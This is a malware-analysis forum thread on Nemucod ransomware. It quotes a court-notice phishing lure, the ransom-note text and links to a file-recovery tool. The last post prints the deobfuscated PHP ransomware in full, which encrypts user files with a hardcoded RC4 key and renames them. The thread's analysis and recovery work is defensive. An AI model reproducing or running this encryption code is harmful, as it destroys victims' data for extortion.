JS/Nemucod (Zippy ransomeware)

Forum for analysis and discussion about malware.
User avatar
maddog4012
Posts: 76
Joined: Mon Aug 04, 2014 6:53 pm

JS/Nemucod (Zippy ransomeware)

Post by maddog4012 » Mon Apr 18, 2016 4:35 pm

came across this over the weekend the java script came as an attachment with the following e-mail message

You have to appear in the Court on the April 22.
You are kindly asked to prepare and bring the documents relating to the case to Court on the specified date.
Note: The case may be heard by the judge in your absence if you do not come.

You can find the Court Notice is in the attachment.

Regards,
Brad Brock,
Court Secretary.


when executed it download a random file with a .png.exe ext
You do not have the required permissions to view the files attached to this post.

Antelox
Posts: 264
Joined: Sun Mar 21, 2010 10:38 pm
Contact:

Re: Zippy ransomeware

Post by Antelox » Wed Apr 20, 2016 2:40 pm


parviz
Posts: 2
Joined: Sun Mar 17, 2013 6:18 am

Re: Zippy ransomeware

Post by parviz » Mon Apr 25, 2016 5:39 am

maddog4012 wrote:came across this over the weekend the java script came as an attachment with the following e-mail message

You have to appear in the Court on the April 22.
You are kindly asked to prepare and bring the documents relating to the case to Court on the specified date.
Note: The case may be heard by the judge in your absence if you do not come.

You can find the Court Notice is in the attachment.

Regards,
Brad Brock,
Court Secretary.


when executed it download a random file with a .png.exe ext
can't find password

User avatar
TETYYSs
Posts: 98
Joined: Fri Jun 28, 2013 6:51 pm

Re: Zippy ransomeware

Post by TETYYSs » Mon Apr 25, 2016 11:47 am

parviz wrote: can't find password
protip: it's on current page you're viewing

Antelox
Posts: 264
Joined: Sun Mar 21, 2010 10:38 pm
Contact:

Re: Zippy ransomeware

Post by Antelox » Fri Apr 29, 2016 1:06 pm

New Nemucod Variant. 7-zip is not used anymore.

https://glot.io/snippets/ee7hiif87k

BR,

Antelox

User avatar
Intimacygel
Posts: 24
Joined: Wed Jun 05, 2013 3:16 pm

Re: Zippy ransomeware

Post by Intimacygel » Fri Apr 29, 2016 3:28 pm

Antelox wrote:New Nemucod Variant. 7-zip is not used anymore.

https://glot.io/snippets/ee7hiif87k

BR,

Antelox
Where do we download those variants from your link?

Antelox
Posts: 264
Joined: Sun Mar 21, 2010 10:38 pm
Contact:

Re: Zippy ransomeware

Post by Antelox » Sun May 01, 2016 8:40 pm

In attachment the archive which contain the original email's attachment.

I wrote simple python scripts to extract the key and recover the files infected by this last Nemucod variant:

https://github.com/Antelox/NemucodFR

BR,

Antelox
You do not have the required permissions to view the files attached to this post.

Antelox
Posts: 264
Joined: Sun Mar 21, 2010 10:38 pm
Contact:

Re: Zippy ransomeware

Post by Antelox » Sun May 22, 2016 1:31 pm

NemucodFR v. 0.2 is out. Now it handles 2 Nemucod variant.

https://github.com/Antelox/NemucodFR

BR,

Antelox

User avatar
xors
Posts: 163
Joined: Mon May 23, 2016 2:01 am

Nemucod Ransomware

Post by xors » Mon Dec 12, 2016 9:45 pm

Hello all,

The dropper is a wsf file. The dropper downloads two files, php4ts.dll and a file which will run a php file (a.php). It looks like the php file is doing the encryption. Some strings

Code: Select all

- If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.
- It`s useless to reinstall Windows, update antivirus software, etc.
- Nobody can help you except us.
- You can find this manual on your desktop (DECRYPT.txt).
- Your files can be decrypted only after you make payment.
0.34008019
1. Create Bitcoin wallet here:
2. Buy 0.43335 BTC with cash, using search here:
3. Send 0.43335 BTC to this Bitcoin address:
4. Open one of the following links in your browser to download decryptor:
5. Run decryptor to restore your files.
All your documents, photos, databases and other important personal files
ATTENTION!
PLEASE REMEMBER:
To restore your files you have to pay 0.43335 BTC (bitcoins).
were encrypted using strong RSA-1024 algorithm with a unique key.

You do not have the required permissions to view the files attached to this post.
@xorsthingsv2

Antelox
Posts: 264
Joined: Sun Mar 21, 2010 10:38 pm
Contact:

Re: Nemucod Ransomware

Post by Antelox » Tue Dec 13, 2016 7:32 am

xors wrote:Hello all,

The dropper is a wsf file. The dropper downloads two files, php4ts.dll and a file which will run a php file (a.php). It looks like the php file is doing the encryption. Some strings

Code: Select all

- If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.
- It`s useless to reinstall Windows, update antivirus software, etc.
- Nobody can help you except us.
- You can find this manual on your desktop (DECRYPT.txt).
- Your files can be decrypted only after you make payment.
0.34008019
1. Create Bitcoin wallet here:
2. Buy 0.43335 BTC with cash, using search here:
3. Send 0.43335 BTC to this Bitcoin address:
4. Open one of the following links in your browser to download decryptor:
5. Run decryptor to restore your files.
All your documents, photos, databases and other important personal files
ATTENTION!
PLEASE REMEMBER:
To restore your files you have to pay 0.43335 BTC (bitcoins).
were encrypted using strong RSA-1024 algorithm with a unique key.

It's the last Nemucod ransomware PHP variant, the one which uses the RC4 encryption; The deobfuscated script below:

Code: Select all

<?php set_time_limit(0);
ini_set("display_errors", "Off");
for ($i = 67;$i <= 90;$i++) if (is_dir(chr($i) . ":")) Tree(chr($i) . ":");
function Tree($p) {
    $s = chr(92);
    $k = base64_decode("MGCQXIq4mcz/0AQ48CBQIFCAiMD4gLDgueobOnOs");
    $a = "e";
    if (preg_match("/" . $s . $s . "(winnt|boot|system|windows|tmp|temp|program|appdata|application|roaming|msoffice|temporary|cache)/i", $p) || preg_match("/recycle/i", $p)) return;
    $dp = opendir($p);
    if ($dp === false) return;
    while ($o = readdir($dp)) if ($o != "." && $o != "..") {
        if (is_dir($p . $s . $o)) {
            Tree($p . $s . $o);
        } elseif ($a == "e" && preg_match("/[.](zip|rar|r00|r01|r02|r03|7z|tar|gz|gzip|arc|arj|bz|bz2|bza|bzip|bzip2|ice|xls|xlsx|doc|docx|pdf|djvu|fb2|rtf|ppt|pptx|pps|sxi|odm|odt|mpp|ssh|pub|gpg|pgp|kdb|kdbx|als|aup|cpr|npr|cpp|bas|asm|cs|php|pas|class|py|pl|h|vb|vcproj|vbproj|java|bak|backup|mdb|accdb|mdf|odb|wdb|csv|tsv|sql|psd|eps|cdr|cpt|indd|dwg|ai|svg|max|skp|scad|cad|3ds|blend|lwo|lws|mb|slddrw|sldasm|sldprt|u3d|jpg|jpeg|tiff|tif|raw|avi|mpg|mp4|m4v|mpeg|mpe|wmf|wmv|veg|mov|3gp|flv|mkv|vob|rm|mp3|wav|asf|wma|m3u|midi|ogg|mid|vdi|vmdk|vhd|dsk|img|iso)$/i", $o) || $a == "d" && preg_match("/[.](crypted)$/i", $o)) {
            chmod($p . $s . $o, 0777);
            $fp = fopen($p . $s . $o, "r+");
            if ($fp !== false) {
                $b = fread($fp, 2048);
                $z = array();
                for ($i = 0;$i < 256;$i++) $z[$i] = $i;
                $j = 0;
                for ($i = 0;$i < 256;$i++) {
                    $j = ($j + $z[$i] + ord($k[$i % strlen($k) ])) % 256;
                    $x = $z[$i];
                    $z[$i] = $z[$j];
                    $z[$j] = $x;
                }
                $i = 0;
                $j = 0;
                $c = "";
                for ($y = 0;$y < strlen($b);$y++) {
                    $i = ($i + 1) % 256;
                    $j = ($j + $z[$i]) % 256;
                    $x = $z[$i];
                    $z[$i] = $z[$j];
                    $z[$j] = $x;
                    $c.= $b[$y] ^ chr($z[($z[$i] + $z[$j]) % 256]);
                }
                fseek($fp, 0);
                fwrite($fp, $c);
                fclose($fp);
                if ($a == "e") {
                    rename($p . $s . $o, $p . $s . $o . ".crypted");
                } else {
                    rename($p . $s . $o, preg_replace("/[.]crypted$/", "", $p . $s . $o));
                }
            }
        }
    }
    closedir($dp);
}
BR,

Antelox

Post Reply